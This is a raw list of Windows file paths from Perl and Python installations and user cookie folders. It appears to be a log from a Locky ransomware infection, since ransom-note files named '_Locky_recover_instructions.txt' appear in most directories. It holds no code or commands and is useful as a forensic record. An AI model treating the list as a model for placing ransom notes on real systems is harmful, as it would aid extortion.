c:\Perl\perl\lib\unicore\lib\Nv\38.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\39.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\3_16.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\3_2.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\3_4.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\3_5.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\3_8.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\4.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\40.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\400.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\4000.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\40000.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\41.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\42.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\43.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\44.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\45.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\46.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\47.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\48.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\49.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\4_5.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\5.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\50.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\500.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\5000.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\50000.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\5_2.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\5_6.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\5_8.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\6.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\60.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\600.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\6000.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\60000.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\7.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\70.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\700.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\7000.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\70000.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\7_2.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\7_8.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\8.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\80.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\800.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\8000.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\80000.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\9.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\90.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\900.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\9000.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\90000.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\9_2.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\NaN.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\_1_2.pl<br />
c:\Perl\perl\lib\unicore\lib\OAlpha\N.pl<br />
c:\Perl\perl\lib\unicore\lib\OAlpha\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\OAlpha\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\ODI\N.pl<br />
c:\Perl\perl\lib\unicore\lib\ODI\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\ODI\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\OGrExt\N.pl<br />
c:\Perl\perl\lib\unicore\lib\OGrExt\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\OGrExt\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\OIDC\N.pl<br />
c:\Perl\perl\lib\unicore\lib\OIDC\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\OIDC\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\OIDS\N.pl<br />
c:\Perl\perl\lib\unicore\lib\OIDS\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\OIDS\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\OLower\N.pl<br />
c:\Perl\perl\lib\unicore\lib\OLower\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\OLower\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\OMath\N.pl<br />
c:\Perl\perl\lib\unicore\lib\OMath\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\OMath\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\OUpper\N.pl<br />
c:\Perl\perl\lib\unicore\lib\OUpper\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\OUpper\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\PatSyn\N.pl<br />
c:\Perl\perl\lib\unicore\lib\PatSyn\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\PatSyn\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\PatWS\N.pl<br />
c:\Perl\perl\lib\unicore\lib\PatWS\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\PatWS\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\Alnum.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Perl\Any.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\Assigned.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\Blank.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\Graph.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\PerlSpac.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\PerlWord.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\PosixAln.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\PosixAlp.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\PosixBla.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\PosixCnt.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\PosixDig.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\PosixGra.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\PosixLow.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\PosixPri.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\PosixPun.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\PosixSpa.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\PosixUpp.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\Print.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\SpacePer.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\VertSpac.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\Word.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\_XBegin.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\_XExtend.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\_XLVLVTV.pl<br />
c:\Perl\perl\lib\unicore\lib\QMark\N.pl<br />
c:\Perl\perl\lib\unicore\lib\QMark\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\QMark\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\Radical\N.pl<br />
c:\Perl\perl\lib\unicore\lib\Radical\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Radical\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\SB\AT.pl<br />
c:\Perl\perl\lib\unicore\lib\SB\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\SB\CL.pl<br />
c:\Perl\perl\lib\unicore\lib\SB\EX.pl<br />
c:\Perl\perl\lib\unicore\lib\SB\FO.pl<br />
c:\Perl\perl\lib\unicore\lib\SB\LE.pl<br />
c:\Perl\perl\lib\unicore\lib\SB\LO.pl<br />
c:\Perl\perl\lib\unicore\lib\SB\SC.pl<br />
c:\Perl\perl\lib\unicore\lib\SB\SE.pl<br />
c:\Perl\perl\lib\unicore\lib\SB\Sp.pl<br />
c:\Perl\perl\lib\unicore\lib\SB\ST.pl<br />
c:\Perl\perl\lib\unicore\lib\SB\UP.pl<br />
c:\Perl\perl\lib\unicore\lib\SB\XX.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Arab.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Sc\Armi.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Armn.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Avst.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Bali.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Bamu.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Beng.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Bopo.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Bugi.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Buhd.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Cans.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Cari.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Cham.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Cher.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Copt.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Cprt.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Cyrl.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Deva.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Egyp.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Ethi.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Geor.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Glag.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Goth.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Grek.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Gujr.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Guru.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Han.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Hang.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Hano.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Hebr.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Hira.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Ital.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Java.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Kana.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Khar.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Khmr.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Knda.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Kthi.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Lana.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Lao.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Latn.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Lepc.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Limb.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Linb.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Lyci.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Lydi.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Mlym.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Mong.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Mtei.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Mymr.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Nko.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Ogam.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Orkh.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Orya.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Osma.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Phag.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Phli.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Phnx.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Prti.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Rjng.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Runr.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Samr.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Saur.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Sinh.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Sund.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Sylo.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Syrc.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Tagb.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Tale.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Talu.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Taml.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Tavt.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Telu.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Tfng.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Tglg.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Thaa.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Thai.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Tibt.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Ugar.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Vai.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Xpeo.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Xsux.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Yi.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Zinh.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Zyyy.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Zzzz.pl<br />
c:\Perl\perl\lib\unicore\lib\SD\N.pl<br />
c:\Perl\perl\lib\unicore\lib\SD\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\SD\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\Space\N.pl<br />
c:\Perl\perl\lib\unicore\lib\Space\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Space\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\STerm\N.pl<br />
c:\Perl\perl\lib\unicore\lib\STerm\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\STerm\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\Term\N.pl<br />
c:\Perl\perl\lib\unicore\lib\Term\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Term\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\UIdeo\N.pl<br />
c:\Perl\perl\lib\unicore\lib\UIdeo\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\UIdeo\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\Upper\N.pl<br />
c:\Perl\perl\lib\unicore\lib\Upper\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Upper\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\VS\N.pl<br />
c:\Perl\perl\lib\unicore\lib\VS\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\VS\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\WB\EX.pl<br />
c:\Perl\perl\lib\unicore\lib\WB\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\WB\FO.pl<br />
c:\Perl\perl\lib\unicore\lib\WB\KA.pl<br />
c:\Perl\perl\lib\unicore\lib\WB\LE.pl<br />
c:\Perl\perl\lib\unicore\lib\WB\MB.pl<br />
c:\Perl\perl\lib\unicore\lib\WB\ML.pl<br />
c:\Perl\perl\lib\unicore\lib\WB\MN.pl<br />
c:\Perl\perl\lib\unicore\lib\WB\NL.pl<br />
c:\Perl\perl\lib\unicore\lib\WB\NU.pl<br />
c:\Perl\perl\lib\unicore\lib\WB\XX.pl<br />
c:\Perl\perl\lib\unicore\lib\XIDC\N.pl<br />
c:\Perl\perl\lib\unicore\lib\XIDC\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\XIDC\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\XIDS\N.pl<br />
c:\Perl\perl\lib\unicore\lib\XIDS\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\XIDS\Y.pl<br />
c:\Perl\perl\lib\unicore\Name.pl<br />
c:\Perl\perl\lib\unicore\To\Bmg.pl<br />
c:\Perl\perl\lib\unicore\To\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\To\Digit.pl<br />
c:\Perl\perl\lib\unicore\To\Fold.pl<br />
c:\Perl\perl\lib\unicore\To\Lower.pl<br />
c:\Perl\perl\lib\unicore\To\NFKCCF.pl<br />
c:\Perl\perl\lib\unicore\To\Title.pl<br />
c:\Perl\perl\lib\unicore\To\Upper.pl<br />
c:\Perl\perl\lib\utf8_heavy.pl<br />
c:\Perl\perl\lib\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\validate.pl<br />
c:\Perl\perl\vendor\lib\Algorithm\cdiff.pl<br />
c:\Perl\perl\vendor\lib\Algorithm\_Locky_recover_instructions.txt<br />
c:\Perl\perl\vendor\lib\Algorithm\diff.pl<br />
c:\Perl\perl\vendor\lib\Algorithm\diffnew.pl<br />
c:\Perl\perl\vendor\lib\Algorithm\htmldiff.pl<br />
c:\Perl\perl\bin\module-version.bat<br />
c:\Perl\perl\bin\_Locky_recover_instructions.txt<br />
c:\Perl\perl\bin\parinstallppd.bat<br />
c:\Perl\perl\bin\perlbug.bat<br />
c:\Perl\perl\bin\perldoc.bat<br />
c:\Perl\perl\bin\perlglob.bat<br />
c:\Perl\perl\bin\perlivp.bat<br />
c:\Perl\perl\bin\perlthanks.bat<br />
c:\Perl\perl\bin\piconv.bat<br />
c:\Perl\perl\bin\pip.bat<br />
c:\Perl\perl\bin\pl2bat.bat<br />
c:\Perl\perl\bin\pl2pm.bat<br />
c:\Perl\perl\bin\pler.bat<br />
c:\Perl\perl\vendor\lib\Crypt\._test.pl<br />
c:\Perl\perl\vendor\lib\Crypt\_Locky_recover_instructions.txt<br />
c:\Perl\perl\vendor\lib\DBD\testme.tmp.pl<br />
c:\Perl\perl\vendor\lib\DBD\_Locky_recover_instructions.txt<br />
c:\Perl\perl\vendor\lib\dbixs_rev.pl<br />
c:\Perl\perl\vendor\lib\_Locky_recover_instructions.txt<br />
c:\Perl\perl\bin\pod2html.bat<br />
c:\Perl\perl\bin\pod2latex.bat<br />
c:\Perl\perl\bin\pod2man.bat<br />
c:\Perl\perl\bin\pod2text.bat<br />
c:\Perl\perl\bin\pod2usage.bat<br />
c:\Perl\perl\bin\podchecker.bat<br />
c:\Perl\perl\bin\podselect.bat<br />
c:\Perl\perl\bin\ppd2par.bat<br />
c:\Perl\perl\bin\ppm.bat<br />
c:\Perl\perl\bin\ppm.pl<br />
c:\Perl\perl\bin\prove.bat<br />
c:\Perl\perl\bin\psed.bat<br />
c:\Perl\perl\bin\pstruct.bat<br />
c:\Perl\perl\bin\ptar.bat<br />
c:\Perl\perl\bin\ptardiff.bat<br />
c:\Perl\perl\bin\ptargrep.bat<br />
c:\Perl\perl\bin\pwhich.bat<br />
c:\Perl\perl\bin\runperl.bat<br />
c:\Perl\perl\bin\s2p.bat<br />
c:\Perl\perl\bin\search.bat<br />
c:\Perl\perl\bin\shasum.bat<br />
c:\Perl\perl\bin\SOAPsh.bat<br />
c:\Perl\perl\bin\SOAPsh.pl<br />
c:\Perl\perl\bin\splain.bat<br />
c:\Perl\perl\bin\stubmaker.bat<br />
c:\Perl\perl\bin\stubmaker.pl<br />
c:\Perl\perl\vendor\lib\qd.pl<br />
c:\Perl\perl\vendor\lib\XML\benchmark.pl<br />
c:\Perl\perl\vendor\lib\XML\_Locky_recover_instructions.txt<br />
c:\Perl\perl\vendor\lib\XML\Parser\LWPExternEnt.pl<br />
c:\Perl\perl\vendor\lib\XML\Parser\_Locky_recover_instructions.txt<br />
c:\Perl\perl\vendor\lib\XML\SAX\placeholder.pl<br />
c:\Perl\perl\vendor\lib\XML\SAX\_Locky_recover_instructions.txt<br />
c:\Perl\relocation.pl.bat<br />
c:\Perl\_Locky_recover_instructions.txt<br />
c:\Perl\update_env.pl.bat<br />
c:\Perl\perl\bin\XMLRPCsh.bat<br />
c:\Perl\perl\bin\XMLRPCsh.pl<br />
c:\Perl\perl\bin\xsubpp.bat<br />
c:\Perl\perl\lib\abbrev.pl<br />
c:\Perl\perl\lib\assert.pl<br />
c:\Perl\perl\lib\bigfloat.pl<br />
c:\Perl\perl\lib\bigint.pl<br />
c:\Perl\perl\lib\bigrat.pl<br />
c:\Perl\perl\lib\bytes_heavy.pl<br />
c:\Perl\perl\lib\cacheout.pl<br />
c:\Perl\perl\lib\complete.pl<br />
c:\Perl\perl\lib\Config_git.pl<br />
c:\Perl\perl\lib\Config_heavy.pl<br />
c:\Perl\c\bin\freetype-config.bat<br />
c:\Perl\c\bin\_Locky_recover_instructions.txt<br />
c:\Perl\c\bin\gdlib-config.bat<br />
c:\Perl\c\bin\libpng-config.bat<br />
c:\Perl\c\bin\libpng12-config.bat<br />
c:\Perl\c\bin\mysql_config.bat<br />
c:\AUTOEXEC.BAT<br />
c:\_Locky_recover_instructions.txt<br />
c:\Perl\c\libexec\gcc\i686-w64-mingw32\4.4.3\install-tools\fixinc.sh<br />
c:\Perl\c\libexec\gcc\i686-w64-mingw32\4.4.3\install-tools\_Locky_recover_instructions.txt<br />
c:\Perl\perl\bin\bdf2gdfont.bat<br />
c:\Perl\perl\bin\bdf2gdfont.pl<br />
c:\Perl\perl\bin\c2ph.bat<br />
c:\Perl\perl\bin\config_data.bat<br />
c:\Perl\perl\bin\corelist.bat<br />
c:\Perl\perl\bin\cpan.bat<br />
c:\Perl\perl\bin\cpan2dist.bat<br />
c:\Perl\perl\bin\cpandb.bat<br />
c:\Perl\perl\bin\cpaninject.bat<br />
c:\Perl\perl\bin\cpanp-run-perl.bat<br />
c:\Perl\perl\bin\cpanp.bat<br />
c:\Perl\perl\bin\cpansign.bat<br />
c:\Perl\perl\bin\crc32.bat<br />
c:\Perl\perl\bin\dbilogstrip.bat<br />
c:\Perl\perl\bin\dbiprof.bat<br />
c:\Perl\perl\bin\dbiproxy.bat<br />
c:\Perl\perl\bin\dprofpp.bat<br />
c:\Perl\perl\bin\enc2xs.bat<br />
c:\Perl\perl\bin\exetype.bat<br />
c:\Perl\perl\bin\exe_update.bat<br />
c:\Perl\perl\bin\exe_update.pl<br />
c:\Perl\perl\bin\find2perl.bat<br />
c:\Perl\perl\bin\findrule.bat<br />
c:\Perl\perl\bin\h2ph.bat<br />
c:\Perl\perl\bin\h2xs.bat<br />
c:\Perl\perl\bin\instmodsh.bat<br />
c:\Perl\perl\bin\json_pp.bat<br />
c:\Perl\perl\bin\json_xs.bat<br />
c:\Perl\perl\bin\largeprimes.bat<br />
c:\Perl\perl\bin\libnetcfg.bat<br />
c:\Perl\perl\bin\llw32helper.bat<br />
c:\Perl\perl\bin\llw32helper.pl<br />
c:\Perl\perl\bin\lwp-download.bat<br />
c:\Perl\perl\bin\lwp-dump.bat<br />
c:\Perl\perl\bin\lwp-mirror.bat<br />
c:\Perl\perl\bin\lwp-request.bat<br />
c:\Perl\perl\bin\lwp-rget.bat<br />
c:\Perl\perl\lib\ctime.pl<br />
c:\Perl\perl\lib\dotsh.pl<br />
c:\Perl\perl\lib\dumpvar.pl<br />
c:\Perl\perl\bin\makerandom.bat<br />
c:\Perl\perl\lib\exceptions.pl<br />
c:\Perl\perl\lib\fastcwd.pl<br />
c:\Perl\perl\lib\filter-util.pl<br />
c:\Perl\perl\lib\find.pl<br />
c:\Perl\perl\lib\finddepth.pl<br />
c:\Perl\perl\lib\flush.pl<br />
c:\Perl\perl\lib\getcwd.pl<br />
c:\Perl\perl\lib\getopt.pl<br />
c:\Perl\perl\lib\getopts.pl<br />
c:\Perl\perl\lib\hostname.pl<br />
c:\Perl\perl\lib\importenv.pl<br />
c:\Perl\perl\lib\look.pl<br />
c:\Perl\perl\lib\newgetopt.pl<br />
c:\Perl\perl\lib\open2.pl<br />
c:\Perl\perl\lib\open3.pl<br />
c:\Perl\perl\lib\perl5db.pl<br />
c:\Perl\perl\lib\pwd.pl<br />
c:\Perl\perl\lib\shellwords.pl<br />
c:\Perl\perl\lib\stat.pl<br />
c:\Perl\perl\lib\syslog.pl<br />
c:\Perl\perl\lib\tainted.pl<br />
c:\Perl\perl\lib\termcap.pl<br />
c:\Perl\perl\lib\timelocal.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\af.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\ar.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\az.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\ca.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\cs.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\cy.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\da.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\de_phone.pl<br />
c:\Python27\Lib\idlelib\idle.bat<br />
c:\Python27\Lib\idlelib\_Locky_recover_instructions.txt<br />
c:\Python27\Lib\test\185test.db<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\eo.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\es.pl<br />
c:\Python27\Lib\test\check_soundcard.vbs<br />
c:\Python27\Lib\test\empty.vbs<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\es_trad.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\et.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\fi.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\fil.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\fo.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\fr.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\ha.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\haw.pl<br />
c:\Python27\tcl\tclConfig.sh<br />
c:\Python27\tcl\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\hr.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\hu.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\hy.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\ig.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\is.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\ja.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\kk.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\kl.pl<br />
c:\Documents and Settings\User\Cookies\user@bing[2].txt<br />
c:\Documents and Settings\User\Cookies\_Locky_recover_instructions.txt<br />
c:\Documents and Settings\User\Cookies\user@adnxs[1].txt<br />
c:\Documents and Settings\User\Cookies\user@222980912.log.optimizely[1].txt<br />
c:\Documents and Settings\User\Cookies\user@bluekai[1].txt<br />
c:\Python27\tcl\tix8.4.3\pref\WmDefault.txt<br />
c:\Python27\Tools\pynche\html40colors.txt<br />
c:\Python27\Tools\pynche\_Locky_recover_instructions.txt<br />
c:\Python27\Tools\pynche\namedcolors.txt<br />
c:\Python27\Tools\pynche\README.txt<br />
c:\Python27\Tools\pynche\webcolors.txt<br />
c:\Perl\licenses\mingw-w64-crt\README.TXT<br />
c:\Perl\licenses\mingw-w64-crt\_Locky_recover_instructions.txt<br />
c:\Perl\licenses\libfreetype\LICENSE.TXT<br />
c:\Perl\licenses\libfreetype\_Locky_recover_instructions.txt<br />
c:\Python27\Tools\pynche\websafe.txt<br />
c:\Perl\licenses\libfreetype\GPL.TXT<br />
c:\Perl\perl\vendor\lib\auto\share\dist\File-ShareDir\sample.txt<br />
c:\Perl\perl\vendor\lib\auto\share\dist\File-ShareDir\_Locky_recover_instructions.txt<br />
c:\Perl\perl\vendor\lib\auto\share\dist\File-ShareDir\subdir\sample.txt<br />
c:\Perl\perl\vendor\lib\auto\share\dist\File-ShareDir\subdir\_Locky_recover_instructions.txt<br />
c:\Perl\perl\vendor\lib\auto\share\module\File-ShareDir\test_file.txt<br />
c:\Perl\perl\vendor\lib\auto\share\module\File-ShareDir\_Locky_recover_instructions.txt<br />
c:\Perl\licenses\libfreetype\FTL.TXT<br />
c:\Perl\licenses\dmake\license.txt<br />
c:\Perl\licenses\dmake\_Locky_recover_instructions.txt<br />
c:\Perl\DISTRIBUTIONS.txt<br />
